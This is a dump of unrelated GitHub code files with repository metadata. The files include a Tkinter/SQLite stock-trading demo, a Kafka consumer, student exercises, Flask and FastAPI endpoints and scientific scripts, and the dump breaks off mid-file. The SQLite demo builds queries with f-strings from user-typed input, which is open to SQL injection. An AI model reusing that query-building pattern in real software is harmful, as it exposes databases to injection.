lane_group <= 7:\n car_position = int(str(lane_group) + str(lane_cell)) # composition of the two postion ID to create a number in interval 0-79\n valid_car = True\n elif lane_group == 0:\n car_position = lane_cell\n valid_car = True\n else:\n valid_car = False # flag for not detecting cars crossing the intersection or driving away from it\n\n if valid_car:\n state[car_position] = 1 # write the position of the car car_id in the state array in the form of \"cell occupied\"\n\n return state\n\n\n @property\n def queue_length_episode(self):\n return self._queue_length_episode\n\n\n @property\n def reward_episode(self):\n return self._reward_episode\n\n\n\n","repo_name":"AndreaVidali/Deep-QLearning-Agent-for-Traffic-Signal-Control","sub_path":"TLCS/testing_simulation.py","file_name":"testing_simulation.py","file_ext":"py","file_size_in_byte":8692,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"72"} +{"seq_id":"30978649752","text":"# ideas taken from\r\n# docs.python.org/3/library/sqllite3/sqllite3.html\r\n# and pythoncentral.io/introduction-to-sqlite-in-python\r\nimport sqlite3\r\nfrom tkinter import *\r\nimport datetime\r\n\r\nconn = sqlite3.connect('stock_trader.db')\r\nc = conn.cursor()\r\n\r\ndef table_exists(table):\r\n sql = f\"SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name='{table}'\"\r\n # print(sql)\r\n tab = c.execute(sql)\r\n for num in tab:\r\n if num[0] == 1:\r\n return True\r\n else:\r\n return False\r\n\r\n# Test table existences\r\nstock = table_exists(\"stocks\")\r\npeople = table_exists(\"people\")\r\ntrans = table_exists(\"trans\")\r\n\r\n# Create tables and test records (rows of data) as required\r\nif stock==False:\r\n c.execute('''CREATE TABLE if NOT EXISTS stocks\r\n (id INTEGER PRIMARY KEY, company text, qty real, price real)''')\r\n c.execute(\"INSERT INTO stocks(company, qty, price) VALUES('Thames',100,3.142)\")\r\n c.execute(\"INSERT INTO stocks(company, qty, price) VALUES('Roding',100,2.718)\")\r\n c.execute(\"INSERT INTO stocks(company, qty, price) VALUES('Canterbury',100,4)\")\r\n c.execute(\"INSERT INTO stocks(company, qty, price) VALUES('Winchester',100,5)\")\r\n c.execute(\"INSERT INTO stocks(company, qty, price) VALUES('Rochester',100,6)\")\r\nif people==False:\r\n c.execute('''CREATE TABLE if NOT EXISTS people\r\n (id INTEGER PRIMARY KEY, name text)''')\r\n c.execute(\"INSERT INTO people(name) VALUES('s1')\")\r\n c.execute(\"INSERT INTO people(name) VALUES('s2')\")\r\n c.execute(\"INSERT INTO people(name) VALUES('s3')\")\r\nif trans==False:\r\n c.execute('''CREATE TABLE if NOT EXISTS trans\r\n (id INTEGER PRIMARY KEY, date text, qty real, price real,\r\n stock_id INTEGER FORIEGN KEY REFERENCES stocks(id), people_id INTEGER FORIEGN KEY REFERENCES people(id))''')\r\n sql = \"INSERT INTO trans(date,qty,price,stock_id,people_id) VALUES('12/12/2012',2,3.4,2,1)\"\r\n sql = \"INSERT INTO trans(date,qty,price,stock_id,people_id) VALUES('12/12/2012',2,3.4,1,2)\"\r\n c.execute(sql)\r\n \r\n# save and commit\r\nconn.commit()\r\n\r\n# read back the test data to the terminal\r\nc.execute(\"SELECT id,company,qty,price from stocks\")\r\nfor row in c:\r\n print(row)\r\nc.execute(\"SELECT * from people\")\r\nfor row in c:\r\n print(row)\r\nc.execute(\"SELECT * from trans\")\r\nfor row in c:\r\n print(row)\r\nc.execute('''SELECT people.name, stocks.company FROM people\r\n JOIN trans ON trans.people_id = people.id\r\n JOIN stocks ON stocks.id = trans.stock_id''')\r\nfor row in c:\r\n print(row)\r\n\r\ndef get_transactions(name):\r\n if name==\"name\" or name==\"\":\r\n where_clause = \"\"\r\n else:\r\n where_clause = f\"WHERE people.name = '{name}'\"\r\n \r\n data = \"Transactions are:\"\r\n sql = f'''SELECT people.name, trans.qty, trans.price, trans.date, stocks.company FROM people\r\n JOIN trans ON trans.people_id = people.id\r\n JOIN stocks ON stocks.id = trans.stock_id {where_clause} '''\r\n print(sql)\r\n c.execute(sql)\r\n for row in c:\r\n data = data + \"\\n\" + str(row)\r\n return data\r\n\r\ndef get_companies():\r\n sql = \"SELECT company,id FROM stocks\"\r\n companies=[]\r\n c.execute(sql)\r\n for row in c:\r\n companies.append(row[0])\r\n companies.append(row[1])\r\n print(companies)\r\n return dict(companies[i:i+2] for i in range(0, len(companies), 2))\r\n\r\ndef get_people():\r\n sql = \"SELECT name,id FROM people\"\r\n people=[]\r\n c.execute(sql)\r\n for row in c:\r\n people.append(row[0])\r\n people.append(row[1])\r\n print(people)\r\n return dict(people[i:i+2] for i in range(0, len(people), 2))\r\n\r\ndef insert_trans(person_id, stock_id, price, qty):\r\n today = datetime.datetime.now()\r\n sql = f\"INSERT into trans (date,qty,price,stock_id,people_id) VALUES('{today}',{qty},{price},{stock_id},{person_id})\"\r\n print(sql)\r\n c.execute(sql)\r\n conn.commit()\r\n \r\n# define the gui\r\nclass trader_gui:\r\n def __init__(self, master):\r\n self.w = Label(master, text=\"Stock transactions\")\r\n self.w.pack()\r\n\r\n view_frame = Frame(master, bg='lavender')\r\n view_frame.pack() #fill=BOTH, expand=True\r\n self.label1 = Label (view_frame, text =(\"Filter by name:\"))\r\n self.label1.pack(side=\"left\")\r\n self.name = StringVar()\r\n self.name.set(\"name\")\r\n self.e_name = Entry (view_frame, textvariable=self.name)\r\n self.e_name.pack(side=\"left\")\r\n self.b_view = Button(view_frame, text = \"View transactions\", command=lambda:self.unpack_gui())\r\n self.b_view.pack(side=\"left\")\r\n \r\n data_frame = Frame(master, bg='grey')\r\n data_frame.pack()\r\n self.t = Text(data_frame)\r\n self.t.pack()\r\n self.t.delete(1.0,END)\r\n self.t.insert(END, get_transactions(self.name.get()))\r\n\r\n trans_frame = Frame(master, bg='green')\r\n trans_frame.pack(fill=BOTH, expand=True)\r\n self.b_add = Button(trans_frame, text = \"New transaction\", command=lambda:self.new_trans())\r\n self.b_add.pack(side=\"right\")\r\n # company list\r\n self.company = StringVar(trans_frame)\r\n self.company.trace(\"w\",self.company_chosen)\r\n self.companies = get_companies()\r\n print(self.companies)\r\n self.company.set(next(iter(self.companies)))\r\n self.compMenu = OptionMenu(trans_frame, self.company, *self.companies)\r\n self.compMenu.pack(side=\"left\")\r\n # current_stock_price\r\n self.price = DoubleVar(trans_frame)\r\n self.pl = Label(trans_frame, textvariable=self.price)\r\n self.pl.pack(side=\"left\")\r\n # person list\r\n self.person = StringVar(trans_frame)\r\n self.person.trace(\"w\",self.person_chosen)\r\n self.people = get_people()\r\n print(self.people)\r\n self.person.set(next(iter(self.people)))\r\n self.persMenu = OptionMenu(trans_frame, self.person, *self.people)\r\n self.persMenu.pack(side=\"left\")\r\n # get current stock price\r\n self.company_chosen()\r\n\r\n def unpack_gui(self):\r\n self.t.delete(1.0,END)\r\n self.t.insert(END, get_transactions(self.name.get()))\r\n\r\n def new_trans(self):\r\n # insert_trans(person_id, stock_id)\r\n insert_trans(self.people[self.person.get()], self.companies[self.company.get()], self.price.get(), 10)\r\n\r\n # Called if company changes - get current stock price\r\n def company_chosen(self, *args):\r\n stock_id = self.companies[self.company.get()]\r\n sql = f\"SELECT price from stocks where id = {stock_id}\"\r\n print(sql)\r\n c.execute(sql)\r\n self.price.set(c.fetchone()[0])\r\n \r\n # Called if person changes - for debug not for functionality\r\n def person_chosen(self, *args):\r\n print(\"Person id is\",self.people[self.person.get()])\r\n\r\n \r\n \r\n# window setup\r\nwindow1 = Tk()\r\nwindow1.geometry(\"500x600\")\r\nwindow1.title(\"Window for GUI\")\r\n# launch the gui\r\napp1 = trader_gui(window1)\r\nwindow1.mainloop()\r\n\r\n# close the connection\r\ninput(\"Press enter to close\")\r\nconn.close()\r\n","repo_name":"catchpolej/python_databases","sub_path":"linked_tables_trial.py","file_name":"linked_tables_trial.py","file_ext":"py","file_size_in_byte":7129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5359396417","text":"import json, os, django\nfrom confluent_kafka import Consumer\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"core.settings\")\ndjango.setup()\n\nfrom django.apps import apps\n\nContact = apps.get_model('automation', 'Contact')\nEmailList = apps.get_model('automation', 'EmailList')\nContactEmailList = apps.get_model('automation', 'ContactEmailList')\nEmailTemplate = apps.get_model('automation', 'EmailTemplate')\nEmailCampaign = apps.get_model('automation', 'EmailCampaign')\nSegment = apps.get_model('automation', 'Segment')\nTag = apps.get_model('automation', 'Tag')\n\nconsumer1 = Consumer({\n 'bootstrap.servers': os.environ.get('KAFKA_BOOTSTRAP_SERVER'),\n 'security.protocol': os.environ.get('KAFKA_SECURITY_PROTOCOL'),\n 'sasl.username': os.environ.get('KAFKA_USERNAME'), \n 'sasl.password': os.environ.get('KAFKA_PASSWORD'),\n 'sasl.mechanism': 'PLAIN',\n 'group.id': os.environ.get('KAFKA_GROUP'),\n 'auto.offset.reset': 'earliest'\n})\nconsumer1.subscribe([os.environ.get('KAFKA_TOPIC')])\n\nwhile True:\n msg1 = consumer1.poll(1.0)\n\n if msg1 is not None and not msg1.error():\n topic1 = msg1.topic()\n value1 = msg1.value()\n\n if topic1 == os.environ.get('KAFKA_TOPIC'):\n if msg1.key() == b'user_agreed':\n user_data = json.loads(value1)\n\n # Create a new Contact entry\n contact, created = Contact.objects.get_or_create(\n email=user_data['email'],\n defaults={\n 'first_name': user_data.get('first_name', ''),\n 'last_name': user_data.get('last_name', '')\n }\n )\n\n if created:\n # Add the new contact to the specified EmailList\n email_list = EmailList.objects.get(pk=1)\n contact_email_list = ContactEmailList(contact=contact, email_list=email_list)\n contact_email_list.save()\n\n # Create or get the desired Tag\n tag, created = Tag.objects.get_or_create(\n name='new_user', # Replace 'new_user' with the desired Tag name\n defaults={'description': 'New users who agreed to receive marketing emails'}\n )\n\n # Add the Tag to the Contact\n contact.tags.add(tag)\n\n # Create or get the desired Segment\n segment, created = Segment.objects.get_or_create(\n name='new_users_segment', # Replace 'new_users_segment' with the desired Segment name\n defaults={\n 'description': 'Segment of new users who agreed to receive marketing emails',\n 'email_list': email_list\n }\n )\n\n # Add the Tag to the Segment\n segment.tags.add(tag)\n\nconsumer1.close()","repo_name":"boomslag/email_microservice","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30730150431","text":"import math\r\nx = float(input(\"Введіть значня x: \"))\r\ny = 0.0\r\nif x>=7.2:\r\n y = math.log(4, math.fabs(x+1))\r\n print(y)\r\nelif x>5.11:\r\n y = (math.log2(math.fabs(math.cos(x))))**(1./2.)\r\n print(y)\r\nelse:\r\n y = math.pow(x,2)+4*math.fabs(x-4)+math.e**x\r\n print(y)\r\n\r\n\r\n","repo_name":"Nikita2707/VKN-1","sub_path":"Лаб 5, Варіант 8.py","file_name":"Лаб 5, Варіант 8.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23570104796","text":"class shopping:\n def __init__(self, name):\n self.name = name\n self.cart = []\n\n def add_to_cart(self, item, price, quantity):\n product = {'product_name':item, 'price':price, 'quantity':quantity}\n self.cart.append(product)\n\n \n #home work for removing item from the list\n def remove_item(self, item):\n for item in self.cart:\n self.cart.remove(item)\n \n\n def checkout(self, amount):\n total = 0\n for item in self.cart:\n print(item)\n total += item['price'] * item['quantity']\n print('total price', total)\n if amount < total:\n print(f'please provide also {total - amount} more.')\n else:\n extra = amount - total\n print(f'here is your items and extra money {extra}')\n \n\nmyself = shopping('ariful islam')\nmyself.add_to_cart('alu', 40, 2)\nmyself.add_to_cart('dal', 50, 5)\nprint(myself.cart)\nmyself.checkout(500)\nmyself.checkout(300)\nmyself.remove_item('alu')\nans = myself.cart\nprint(ans)\n","repo_name":"Arif-462/python_cousrse","sub_path":"Week 2 OOP/Module 05 Class and object/5.6_shopping.py","file_name":"5.6_shopping.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69813032874","text":"t = int(input())\nfor a in range(t):\n n, x = map(int,input().split())\n A = [int(i) for i in input().split()]\n B = [int(i) for i in input().split()]\n A.sort()\n B.sort(reverse=True)\n ans = True\n for i in range(n):\n if A[i]+B[i]<=x:\n continue\n else:\n ans=False\n break\n if ans ==True:\n print('Yes')\n else:\n print('No')\n if a!=t-1:\n blank=input()\n\n","repo_name":"JannaKim/PS","sub_path":"codeforces/Arrat_re.py","file_name":"Arrat_re.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11091377720","text":"\"\"\"\nКласс, связывающий работу Модели и Вида. В нём определён метод, запускающий\nприложение.\n\"\"\"\nimport re\n\n\nclass Presenter:\n def __init__(self, view, model):\n self.view = view\n self.model = model\n\n # Запуск приложения\n def run(self):\n is_continue = True\n while is_continue:\n self.view.output('Введите действие: \\n'\n 'create - создание заметки\\n'\n 'read - чтение заметок\\n'\n 'update - изменение заметки\\n'\n 'delete - удаление заметки\\n'\n 'exit - выход')\n request = self.view.input()\n if request == 'exit':\n is_continue = False\n elif request == 'create':\n self.view.output('Введите заголовок заметки: ')\n header = self.view.input()\n self.view.output('Введите тело заметки: ')\n body = self.view.input()\n if header == \"\" and body == \"\":\n self.view.output('Вы ничего не ввели. '\n 'Заметка не была создана')\n else:\n self.model.create(header, body)\n self.view.output('Заметка успешно сохранена')\n elif request == 'read':\n self.view.output('Введите:\\n'\n 'all - для вывода всех заметок\\n'\n 'дату в формате \"дд мм гггг\" - для '\n 'выборки заметок по дате')\n user_date = self.view.input()\n if user_date == 'all':\n list_notes = self.model.read_all()\n self.view.print_notes(list_notes)\n elif re.match(r'^\\d{2}\\s\\d{2}\\s\\d{4}$', user_date):\n list_notes = self.model.read(user_date)\n self.view.print_notes(list_notes)\n else:\n self.view.output(f'Нераспознанная команда \"{user_date}\" '\n 'Повторите ввод')\n elif request == 'update':\n self.view.output('Укажите id изменяемой заметки: ')\n user_input = self.view.input()\n try:\n number = int(user_input)\n except ValueError:\n self.view.output(f'Вы ввели \"{user_input}\", что не '\n f'является числом. Повторите ввод')\n continue\n self.view.output('Введите новый заголовок и нажмите '\n 'клавишу Enter, если хотите его '\n 'изменить. Иначе - просто нажмите '\n 'клавишу Enter: ')\n new_header = self.view.input()\n self.view.output('Введите новое тело заметки и нажмите'\n ' клавишу Enter, если хотите его '\n 'изменить. Иначе - просто нажмите '\n 'клавишу Enter: ')\n new_body = self.view.input()\n if new_header == \"\" and new_body == \"\":\n self.view.output('Вы ничего не ввели. '\n 'Заметка не была изменена')\n else:\n info_update = self.model.update(number, new_header,\n new_body)\n self.view.output(info_update)\n elif request == 'delete':\n self.view.output('Укажите id удаляемой заметки: ')\n user_input = self.view.input()\n try:\n number = int(user_input)\n except ValueError:\n self.view.output(f'Вы ввели \"{user_input}\", что не '\n f'является числом. Повторите ввод')\n continue\n info_delete = self.model.delete(number)\n self.view.output(info_delete)\n else:\n self.view.output(f'Нераспознанная команда \"{request}\" '\n 'Повторите ввод')\n","repo_name":"NikitaaaGudkov/Intermediate_control_work","sub_path":"task_1/presenters/Presenter.py","file_name":"Presenter.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19493019569","text":"from fastapi import APIRouter, HTTPException\nfrom typing import List\nfrom pydantic import BaseModel\n\nfrom ..alchemy.brew import brew_potion\nfrom ..alchemy.base import validate\n\n\nroute = APIRouter()\n\n\nclass PotionBrew(BaseModel):\n materials: List[str]\n technic: str\n\n\n@route.post(\"/brew\")\ndef api_set_potion(ingredients: PotionBrew):\n try:\n validate(ingredients.materials, ingredients.technic)\n return brew_potion(ingredients.materials, ingredients.technic)\n except ValueError as e:\n raise HTTPException(status_code=400, detail=str(e))\n except (KeyError, IndexError) as e:\n raise HTTPException(status_code=404, detail=str(e))\n","repo_name":"uriahrokach/LibraAlchemy","sub_path":"backend/src/app/server/api/brew.py","file_name":"brew.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3483210191","text":"# automation has saved my sanity, thanks izik1 for the documentation\nimport requests\nimport json\nimport re\n\nld_r16_u16 = re.compile(\"LD (..),u16$\")\nld_r16_r8 = re.compile(\"LD \\((..)\\),(.)$\")\ninc_r16 = re.compile(\"INC (..)$\")\ninc_r8 = re.compile(\"INC (.)$\")\ndec_r16 = re.compile(\"DEC (..)$\")\ndec_r8 = re.compile(\"DEC (.)$\")\nld_r8_u8 = re.compile(\"LD (.),u8$\")\nrlc = re.compile(\"RLC(.)$\")\nld_r8_r8 = re.compile(\"LD (.),\\(?(..|.)\\)?$\")\nadd_a_r8 = re.compile(\"ADD A,\\(?(..|.)\\)?$\")\naddc_a_r8 = re.compile(\"ADC A,\\(?(..|.)\\)?$\")\nsub_a_r8 = re.compile(\"SUB A,\\(?(..|.)\\)?$\")\nsubc_a_r8 = re.compile(\"SBC A,\\(?(..|.)\\)?$\")\nand_a_r8 = re.compile(\"AND A,\\(?(..|.)\\)?$\")\nxor_a_r8 = re.compile(\"XOR A,\\(?(..|.)\\)?$\")\nor_a_r8 = re.compile(\"OR A,\\(?(..|.)\\)?$\")\ncp_a_r8 = re.compile(\"CP A,\\(?(..|.)\\)?$\")\nretc = re.compile(\"RET (..|.)\")\ndef parseOp(op):\n out = \"\"\n if ld_r16_u16.match(op):\n reg = ld_r16_u16.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.ld_r16_u16(Register.\" + reg + \")}\"\n elif ld_r16_r8.match(op):\n reg1, reg2 = ld_r16_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.ld_r16_r8(Register.\" + reg1 + \", Register.\" + reg2 + \")}\"\n elif inc_r16.match(op):\n reg = inc_r16.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.inc_r16(Register.\" + reg + \")}\"\n elif inc_r8.match(op):\n reg = inc_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.inc_r8(Register.\" + reg + \")}\"\n elif dec_r16.match(op):\n reg = dec_r16.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.dec_r16(Register.\" + reg + \")}\"\n elif dec_r8.match(op):\n reg = dec_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.dec_r8(Register.\" + reg + \")}\"\n elif ld_r8_u8.match(op):\n reg = ld_r8_u8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.ld_r8_u8(Register.\" + reg + \")}\"\n elif rlc.match(op):\n reg = rlc.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.rlc(Register.\" + reg + \")}\"\n elif ld_r8_r8.match(op):\n dest, src = ld_r8_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.ld_r8_r8(Register.\" + dest + \", Register.\" + src + \")}\"\n elif add_a_r8.match(op):\n reg = add_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.add_a_r8(Register.\" + reg + \")}\"\n elif addc_a_r8.match(op):\n reg = addc_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.addc_a_r8(Register.\" + reg + \")}\"\n elif sub_a_r8.match(op):\n reg = sub_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.sub_a_r8(Register.\" + reg + \")}\"\n elif subc_a_r8.match(op):\n reg = subc_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.subc_a_r8(Register.\" + reg + \")}\"\n elif and_a_r8.match(op):\n reg = and_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.and_a_r8(Register.\" + reg + \")}\"\n elif xor_a_r8.match(op):\n reg = xor_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.xor_a_r8(Register.\" + reg + \")}\"\n elif or_a_r8.match(op):\n reg = or_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.or_a_r8(Register.\" + reg + \")}\"\n elif cp_a_r8.match(op):\n reg = cp_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.cp_a_r8(Register.\" + reg + \")}\"\n elif retc.match(op):\n reg = retc.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.retc(Condition.\" + reg + \")}\"\n else:\n out = \"{cpu: Cpu -> }\"\n return out\n\n# r = requests.get(\"https://izik1.github.io/gbops/table/dmgops.json\")\n# open(\"ops.json\", \"r\").write(r.text)\n# json = r.json()\njson = json.loads(open(\"ops.json\",\"r\").read())\ntemplate = \"op[{}] = Opcode(\\\"{}\\\", {}, {}) {}\"\nout = []\nfor i, k in enumerate(json[\"Unprefixed\"]):\n code = hex(i)[:2] + hex(i)[2:].upper()\n name = k[\"Name\"]\n length = k[\"Length\"]\n time = k[\"TCyclesBranch\"]\n if(i % 16 == 0):\n out.append(\"\")\n out.append(template.format(code,name,length,time,parseOp(name)))\n\nfor i in out:\n print(i)\n\n","repo_name":"tsheinen/gameboy","sub_path":"utils/gbopmapper.py","file_name":"gbopmapper.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27645196467","text":"\nfrom flask import Flask, request, jsonify, render_template\nfrom flask_cors import CORS\n\nimport paddlehub as hub\nimport cv2\nimport numpy as np\n\napp = Flask(__name__)\nCORS(app)\napp.config['JSON_AS_ASCII'] = False\napp.config['JSONIFY_MIMETYPE'] = \"application/json;charset=utf-8\"\n\n@app.route(\"/ocr\", methods=['GET', 'POST'])\ndef ocr_route():\n if request.method == 'POST':\n buf = request.files['file'].read()\n image = np.frombuffer(buf, np.uint8)\n img = cv2.imdecode(image, 1)\n ocr = hub.Module(name=\"ch_pp-ocrv3\", enable_mkldnn=True)\n results = ocr.recognize_text(images=[img])\n result = results[0]['data']\n\n return jsonify({'result': result})\n else:\n return render_template('upload.html')\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"fanlia/paddlehub-docker","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10024351465","text":"from logging import handlers\nimport os, sys\n\nfrom os.path import join as opj\n\nimport logging\nfrom logdecorator import log_on_start, log_on_end\nlog = logging.getLogger(__name__)\n\nimport numpy as np\nimport subprocess\n\n\n# bashCommand = [\"ls\", \"{}/p_p*/wflms/*\".format(self.analysispath), \"|\", \"wc\" ,\"-l\"]\n# process = subprocess.Popen(bashCommand, stdout=subprocess.PIPE, text=True, shell=True)\n# output, error = process.communicate()\n# log.info(output)\n\n\nclass analysisreport:\n def __init__(self, reportmodel):\n self.__dict__.update(reportmodel.__dict__)\n\n\n @log_on_start(logging.INFO, \"collect_jobs() started\")\n @log_on_end(logging.INFO, \"collect_jobs() finished\")\n def collect_jobs(self):\n jobs = []\n jobs.append(0)\n self.jobs = jobs\n\n\n def count(self, filenames, it):\n wflm_c= 0\n btempl_c = 0\n\n if any(\"p_it{}.npy\".format(it) in filename for filename in filenames):\n wflm_c += 1\n if any(\"btempl_p{:03d}\".format(it) in filename for filename in filenames):\n btempl_c += 1\n\n return np.array([wflm_c, btempl_c])\n \n\n @log_on_start(logging.INFO, \"run() started\")\n @log_on_end(logging.INFO, \"run() finished\")\n def run(self):\n\n log.info(\"status report for {}\".format(self.analysispath))\n for n in range(3):\n log.info(\"==============================================\")\n for n in range(3):\n log.info(\"\")\n\n qlms_dd_ct = 0\n for idx in self.jobs:\n for dirpath, dirnames, filenames in os.walk(self.analysispath):\n for fn in filenames:\n with open(opj(dirpath,fn), 'r', encoding = 'latin1') as f:\n first_line = f.readline(0)\n if dirpath.endswith('qlms_dd'):\n qlms_dd_ct += len([filename for filename in filenames if filename.startswith(\"sim_p_p\")])\n log.info(\"qlms:\")\n log.info('------------------------')\n log.info(\"{}/{} QE phis are there\".format(qlms_dd_ct, self.imax+1))\n \n counts = np.zeros(shape=2, dtype=np.int)\n for idx in self.jobs:\n log.info(\"\")\n log.info(\"Wflms and B-templates:\")\n log.info('------------------------')\n for it in np.arange(0,self.itmax+1):\n counts = np.zeros(shape=2, dtype=np.int)\n for dirpath, dirnames, filenames in os.walk(self.analysispath):\n if dirpath.endswith('wflms'):\n if self.version == '':\n if len(dirpath.split('/')[-2]) == 11:\n counts += self.count(filenames, it)\n else:\n if dirpath.split('/')[-2].endswith(self.version):\n counts += self.count(filenames, it)\n log.info(\"it {}:\".format(it))\n log.info(\"wflm{}: {}/{} \".format(it, counts[0], self.imax+1))\n log.info(\"btempl_p0{}: {}/{}\".format(it, counts[1], self.imax+1))\n\n\n for n in range(3):\n log.info(\"\")\n for n in range(3):\n log.info(\"==============================================\")\n","repo_name":"NextGenCMB/delensalot","sub_path":"delensalot/config/sr.py","file_name":"sr.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"6196215155","text":"\nfrom osgeo import gdal,osr,gdalconst\nimport pandas as pd\nimport numpy as np\nimport os\nimport sys\nimport geopandas as gpd\n\ngdal.UseExceptions()\nsrs=osr.SpatialReference()\nsrs.ImportFromProj4('+proj=lcc +lat_0=0 +lon_0=105 +lat_1=30 +lat_2=62 +x_0=0 +y_0=0 +datum=WGS84 +units=m +no_defs +type=crs')\n\n#Convert the habitat loss pixels of area ID 10 in 2000 to tif file format\nID=10\nyear=2000\n\npatchs=gpd.read_file('/root/work/BIO/new_code/data/patchs.shp')\nIDinfo=pd.read_csv('/mnt/d5/GH/work/BIO/fix/code/IDinfo.csv')\ncsv=pd.read_csv(f'/mnt/d5/GH/work/BIO/fix/res/loss/loss_indirect_fix/VU/{ID}_id.csv')\ncsv=csv[csv['year']==year]\n\nrow=int(IDinfo.loc[IDinfo['ID']==ID,'row'])\ncol=int(IDinfo.loc[IDinfo['ID']==ID,'col'])\n\ngeometry=patchs.loc[patchs['ID']==ID,'geometry'].tolist()[0]\nxys=geometry.exterior.coords[:-1]\nxs=[item[0] for item in xys]\nys=[item[1] for item in xys]\nminx=min(xs)\nmaxy=max(ys)\nmaxx=max(xs)\nminy=min(ys)\n\n\nres=np.zeros((row,col))\nfor i,item in csv.iterrows():\n r=int(item['row'])\n c=int(item['col'])\n res[r,c]=item['value']\n\n\ndriver = gdal.GetDriverByName(\"GTiff\") \nds=driver.Create(f'/mnt/d5/GH/work/TP/mid/sample.tif',col,row,1,gdal.GDT_Int32,options=['COMPRESS=LZW'])\nband=ds.GetRasterBand(1)\nband.SetNoDataValue(0)\nband.WriteArray(res,0,0)\nds.SetGeoTransform([minx,30,0,maxy,0,-30])\nds.SetProjection(srs.ExportToWkt())\nds=None\n","repo_name":"sjtcwdsj/biodiversity","sub_path":"sample/sample-totif.py","file_name":"sample-totif.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32566478749","text":"import os, time, glob\nimport shutil\nfrom multiprocessing.pool import ThreadPool\n\nfrom app_windows.realityCapture.genericTask import GenericTask\n\n\nbox_rcbox = '''\n\n
\n \n \n\n'''\nDetectMarkersParams_xml = '''\n\n \n \n \n \n \n \n\n'''\nExportRegistrationSettings_xml = '''\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n'''\nXMPSettings_xml = '''\n\n \n \n \n \n \n \n\n'''\ngroundPlaneImport_xml = '''\n\n \n \n \n \n \n \n \n \n \n\n'''\n\n\n\n\nclass PrepareFolder(GenericTask):\n def __init__(self, rc_job):\n super().__init__(rc_job)\n\n def run(self):\n self.set_status(\"active\")\n\n\n if not os.path.exists(self.rc_job.rc_cache_dir):\n os.mkdir(self.rc_job.rc_cache_dir)\n self.log.append(\"Cache directory created %s\" % self.rc_job.rc_cache_dir)\n\n if not os.path.exists(self.rc_job.workingdir):\n os.mkdir(self.rc_job.workingdir)\n self.log.append(\"Cache directory created %s\" % self.rc_job.workingdir)\n else:\n self.log.append(\"Cache found at %s\" % self.rc_job.workingdir)\n\n with open(os.path.join(self.rc_job.workingdir, \"last_usage\"), \"w\") as f:\n f.write(\"%s\" % int(time.time()))\n\n if not os.path.exists(os.path.join(self.rc_job.workingdir, \"tmp\")):\n os.mkdir(os.path.join(self.rc_job.workingdir, \"tmp\"))\n if not os.path.exists(os.path.join(self.rc_job.workingdir, self.rc_job.export_foldername)):\n os.mkdir(os.path.join(self.rc_job.workingdir, self.rc_job.export_foldername))\n\n with open(self.get_path(\"DetectMarkersParams.xml\"), \"w\") as f:\n f.write(DetectMarkersParams_xml)\n with open(self.get_path(\"box.rcbox\"), \"w\") as f:\n f.write(box_rcbox % (round(self.rc_job.box_dimensions[0], 4), round(self.rc_job.box_dimensions[1], 4), round(self.rc_job.box_dimensions[2], 4), round(self.rc_job.box_dimensions[2]/2, 4)))\n with open(self.get_path(\"exportRegistrationSettings.xml\"), \"w\") as f:\n f.write(ExportRegistrationSettings_xml)\n with open(self.get_path(\"xmp_settings.xml\"), \"w\") as f:\n f.write(XMPSettings_xml)\n with open(self.get_path(\"groundPlaneImport.xml\"), \"w\") as f:\n f.write(groundPlaneImport_xml)\n\n if len(self.rc_job.license_data) > 0:\n with open(self.get_path(\"license.rclicense\"), \"w\") as f:\n f.write(self.rc_job.license_data)\n\n if self.rc_job.source_ip is None:\n if not os.path.exists(os.path.join(self.rc_job.workingdir, \"images\")):\n 